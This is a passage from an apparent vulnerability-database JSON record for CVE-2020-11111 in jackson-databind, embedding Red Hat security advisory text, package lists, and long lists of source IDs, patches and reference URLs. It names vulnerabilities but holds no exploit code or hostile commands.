leading to dangerous application mapping which could result in security bypass\n1793970 - CVE-2020-1710 EAP: field-name is not parsed in accordance to RFC7230\n1796617 - CVE-2020-1719 Wildfly: EJBContext principal is not popped back after invoking another EJB using a different Security Domain\n1807305 - CVE-2020-1745 undertow: AJP File Read/Inclusion Vulnerability\n1807707 - CVE-2020-1748 Wildfly: Improper authorization issue in WildFlySecurityManager when using alternative protection domain\n1815470 - CVE-2020-10673 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution\n1815495 - CVE-2020-10672 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution\n1816216 - CVE-2020-11612 netty: compression/decompression codecs don\u0027t enforce limits on buffer allocation sizes\n1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking\n1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config\n1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap\n1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core\n1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider\n1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane\n1821304 - CVE-2020-11111 jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory\n1821311 - CVE-2020-11112 jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider\n1821315 - CVE-2020-11113 jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime\n1825714 - CVE-2020-10714 wildfly-elytron: session fixation when using FORM authentication\n1826798 - CVE-2020-11620 jackson-databind: Serialization gadgets in commons-jelly:commons-jelly\n1826805 - CVE-2020-11619 jackson-databind: Serialization gadgets in org.springframework:spring-aop\n1831139 - CVE-2020-9488 log4j: improper validation of certificate with host mismatch in SMTP appender\n\n5. \nThe purpose of this text-only errata is to inform you about the security\nissues fixed in this release. \n\nInstallation instructions are available from the Fuse 7.7.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.7/\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1343616 - CVE-2016-4970 netty: Infinite loop vulnerability when handling renegotiation using SslProvider.OpenSsl\n1620529 - CVE-2018-1000632 dom4j: XML Injection in Class: Element. Methods: addElement, addAttribute which can impact the integrity of XML documents\n1632452 - CVE-2018-3831 elasticsearch: Information exposure via _cluster/settings API\n1637492 - CVE-2018-11797 pdfbox: unbounded computation in parser resulting in a denial of service\n1638391 - CVE-2018-12541 vertx: WebSocket HTTP upgrade implementation holds the entire http request in memory before the handshake\n1697598 - CVE-2019-3797 spring-data-jpa: Additional information exposure with Spring Data JPA derived queries\n1700016 - CVE-2019-0231 mina-core: Retaining an open socket in close_notify SSL-TLS leading to Information disclosure. \n1713468 - CVE-2019-12086 jackson-databind: polymorphic typing issue allows attacker to read arbitrary local files on the server. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: rh-maven35-jackson-databind security update\nAdvisory ID: RHSA-2020:1523-01\nProduct: Red Hat Software Collections\nAdvisory URL: https://access.redhat.com/errata/RHSA-2020:1523\nIssue date: 2020-04-21\nCross references: 1822587 1822174 1822932 1822937 1822927\nCVE Names: CVE-2020-10968 CVE-2020-10969 CVE-2020-11111 \n CVE-2020-11112 CVE-2020-11113 \n=====================================================================\n\n1. Summary:\n\nAn update for rh-maven35-jackson-databind is now available for Red Hat\nSoftware Collections. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - noarch\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.5) - noarch\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6) - noarch\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7) - noarch\nRed Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - noarch\n\n3. Description:\n\nThe jackson-databind package provides general data-binding functionality\nfor Jackson, which works on top of Jackson core streaming API. \n\nSecurity Fix(es):\n\n* jackson-databind: Serialization gadgets in\norg.aoju.bus.proxy.provider.*.RmiProvider (CVE-2020-10968)\n\n* jackson-databind: Serialization gadgets in javax.swing.JEditorPane\n(CVE-2020-10969)\n\n* jackson-databind: Serialization gadgets in\norg.apache.activemq.jms.pool.XaPooledConnectionFactory (CVE-2020-11111)\n\n* jackson-databind: Serialization gadgets in\norg.apache.commons.proxy.provider.remoting.RmiProvider (CVE-2020-11112)\n\n* jackson-databind: Serialization gadgets in\norg.apache.openjpa.ee.WASRegistryManagedRuntime (CVE-2020-11113)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider\n1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane\n1821304 - CVE-2020-11111 jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory\n1821311 - CVE-2020-11112 jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider\n1821315 - CVE-2020-11113 jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime\n\n6. Package List:\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):\n\nSource:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm\n\nnoarch:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm\nrh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):\n\nSource:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm\n\nnoarch:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm\nrh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.5):\n\nSource:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm\n\nnoarch:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm\nrh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6):\n\nSource:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm\n\nnoarch:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm\nrh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7):\n\nSource:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm\n\nnoarch:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm\nrh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm\n\nnoarch:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm\nrh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2020-10968\nhttps://access.redhat.com/security/cve/CVE-2020-10969\nhttps://access.redhat.com/security/cve/CVE-2020-11111\nhttps://access.redhat.com/security/cve/CVE-2020-11112\nhttps://access.redhat.com/security/cve/CVE-2020-11113\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2020 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXp7oOtzjgjWX9erEAQghsBAAk6mN7QOctoM4gV9BDkYybnwjFrgzSgQg\nLahdpBV7QmHQ/6rdhSlbE8sGCdrUwLJy1GvRS1PzvUY2IzLf8c0rtzcHrIiD1wWB\nN5kEBWiNgHOpuU4etwbR9gGsY7hhSvyxzTyRhHU36UQJqyNoc95DfbokqeAf8Ggp\ndfw20J8hsCkQ6OkvDCM6T9fY7jcbHdiD4jx8WSMn3bQS3o8zRf1JJlMPOqLnHM+J\n998+RIzoJYqqdL7XNWPMopvR1yps2Xx+NTL4+2Vg8e+2KVxO+ksIu3EqRsCRD0wT\n22iPNX3r8ETjWcfLGw0Imvc8RiRsCL7L4oa+cbIpnBdvsRr/yW8IYmvJmHwFTZlK\n+vIyYPAfSCLuHSktXEwZ9WDMeFsJfZr+zdVZ5MmOgvMAIqg+0RSE3VBlzmuAOMbv\nyNz6SPODozvMDPmW1OwLhtGsu1CigORIuTRcNSYwTkXVoAxFhWXK0sHuxc3h1ne0\nx38Tgk1grF7xbBSfvJwFn0MfBhufg4+iUuFhte7mtuSu3gvjQ/qt01Oo11p8cW2m\ng6lX1NGEsUpEONf0NS+1hFSxWB4ex7ln98e5AqNWtLHt3S5OHzI67+/4dgl5xF7J\nPdLv4j8b1AqTV8wRX6pK59OeslYcPhYdMWHEbMSkQJ3WZFOILkyTm6HWer9kl3Yt\n8yoMyLl6FBM=\n=n1if\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-11111"
},
{
"db": "VULHUB",
"id": "VHN-163657"
},
{
"db": "VULMON",
"id": "CVE-2020-11111"
},
{
"db": "PACKETSTORM",
"id": "158650"
},
{
"db": "PACKETSTORM",
"id": "157741"
},
{
"db": "PACKETSTORM",
"id": "160601"
},
{
"db": "PACKETSTORM",
"id": "157859"
},
{
"db": "PACKETSTORM",
"id": "158651"
},
{
"db": "PACKETSTORM",
"id": "159208"
},
{
"db": "PACKETSTORM",
"id": "158636"
},
{
"db": "PACKETSTORM",
"id": "157322"
}
],
"trust": 1.8
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2020-11111",
"trust": 2.6
},
{
"db": "PACKETSTORM",
"id": "159208",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "158651",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "160601",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1737",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "157859",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "157322",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2020.1399",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1766",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2588",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.4471",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3190",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1368",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1882",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2619",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022060909",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "48395",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "158650",
"trust": 0.2
},
{
"db": "CNVD",
"id": "CNVD-2020-21474",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-163657",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2020-11111",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "157741",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "158636",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163657"
},
{
"db": "VULMON",
"id": "CVE-2020-11111"
},
{
"db": "PACKETSTORM",
"id": "158650"
},
{
"db": "PACKETSTORM",
"id": "157741"
},
{
"db": "PACKETSTORM",
"id": "160601"
},
{
"db": "PACKETSTORM",
"id": "157859"
},
{
"db": "PACKETSTORM",
"id": "158651"
},
{
"db": "PACKETSTORM",
"id": "159208"
},
{
"db": "PACKETSTORM",
"id": "158636"
},
{
"db": "PACKETSTORM",
"id": "157322"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1737"
},
{
"db": "NVD",
"id": "CVE-2020-11111"
}
]
},
"id": "VAR-202003-1787",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-163657"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T22:59:46.874000Z",
"patch": {
"_id": null,
"data": [
{
"title": "FasterXML jackson-databind Fixes for code issue vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=115371"
},
{
"title": "Red Hat: Moderate: Red Hat Single Sign-On 7.4.0 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20205625 - Security Advisory"
},
{
"title": "Red Hat: Important: rh-maven35-jackson-databind security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20201523 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Data Grid 7.3.7 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203779 - Security Advisory"
},
{
"title": "Red Hat: Important: EAP Continuous Delivery Technical Preview Release 19 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202333 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Process Automation Manager 7.8.0 Security Update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203197 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Decision Manager 7.8.0 Security Update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203196 - Security Advisory"
},
{
"title": "IBM: Security Bulletin: Multiple Security Vulnerabilities in Jackson-Databind Affect IBM Sterling B2B Integrator",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=9bb4efe27af18414a7db703d1dd40070"
},
{
"title": "Red Hat: Important: Red Hat build of Thorntail 2.5.1 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202067 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Fuse 7.7.0 release and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203192 - Security Advisory"
},
{
"title": "Hitachi Security Advisories: Multiple Vulnerabilities in Cosminexus",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories\u0026qid=hitachi-sec-2021-109"
},
{
"title": "IBM: Security Bulletin: z/Transaction Processing Facility is affected by multiple vulnerabilities in the jackson-databind, jackson-dataformat-xml, jackson-core, slf4j-ext, and cxf-core packages",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=f974282a27702bae4111bf7716ee6cf6"
},
{
"title": "cubed",
"trust": 0.1,
"url": "https://github.com/yahoo/cubed "
},
{
"title": "Java-Deserialization-CVEs",
"trust": 0.1,
"url": "https://github.com/PalindromeLabs/Java-Deserialization-CVEs "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-11111"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1737"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-502",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163657"
},
{
"db": "NVD",
"id": "CVE-2020-11111"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.8,
"url": "https://security.netapp.com/advisory/ntap-20200403-0002/"
},
{
"trust": 1.8,
"url": "https://github.com/fasterxml/jackson-databind/issues/2664"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"trust": 1.8,
"url": "https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"
},
{
"trust": 1.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11111"
},
{
"trust": 1.0,
"url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"
},
{
"trust": 0.8,
"url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2020-11112"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2020-11113"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2020-10968"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.8,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.8,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2020-11111"
},
{
"trust": 0.7,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnerabilities-in-jackson-databind-affect-ibm-sterling-b2b-integrator-3/"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2020-10969"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-9547"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-10672"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-11619"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-11620"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10968"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1882/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1368/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.4471/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022060909"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-series-of-vulnerabilities-in-fasterxml-jackson-databind-affect-apache-solr-shipped-with-ibm-operations-analytics-log-analysis/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/158651/red-hat-security-advisory-2020-3197-01.html"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/fasterxml-jackson-databind-denial-of-service-via-activemq-serialization-gadgets-typing-32063"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-jackson-databind-shipped-with-ibm-cloud-pak-system/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159208/red-hat-security-advisory-2020-3779-01.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6528214"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/157859/red-hat-security-advisory-2020-2333-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2588/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3190/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6525182"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-faster-xml-jackson-databind-affect-ibm-spectrum-protect-plus-cve-2020-10673-cve-2020-1112-cve-2020-11113-cve-2020-10672-cve-2020-10968-cve-2020-10969-cve-2/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2619/"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/48395"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-affects-ibm-jazz-foundation-and-ibm-engineering-products/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1766/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/157322/red-hat-security-advisory-2020-1523-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/160601/red-hat-security-advisory-2020-5625-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1399/"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-9546"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20330"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-10673"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-9548"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-8840"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10672"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2019-20330"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-7238"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11112"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10969"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11113"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-17573"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20444"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11620"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17573"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-20445"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-20444"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11619"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20445"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-10086"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10086"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12406"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9514"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-14060"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-9512"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-12406"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11612"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-9514"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-9515"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-14061"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-14062"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-16869"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9512"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-12423"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-11612"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16869"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12423"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10673"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-16335"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-16943"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-17531"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16335"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17531"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-14540"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17267"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16942"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14892"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16943"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-17267"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-14893"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-16942"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14893"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-14888"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-14892"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14540"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14888"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-1745"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/errata/rhsa-2020:5625"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14060"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1718"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9515"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-13990"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-1718"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9518"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13990"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9518"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14061"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14062"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9511"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12400"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-0210"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-0205"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12419"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-0210"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9511"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14887"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-12419"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-0205"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-12400"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-14887"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-1695"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-10172"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10172"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-1757"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/502.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/palindromelabs/java-deserialization-cves"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3196"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=rhdm\u0026version=7.8.0"
},
{
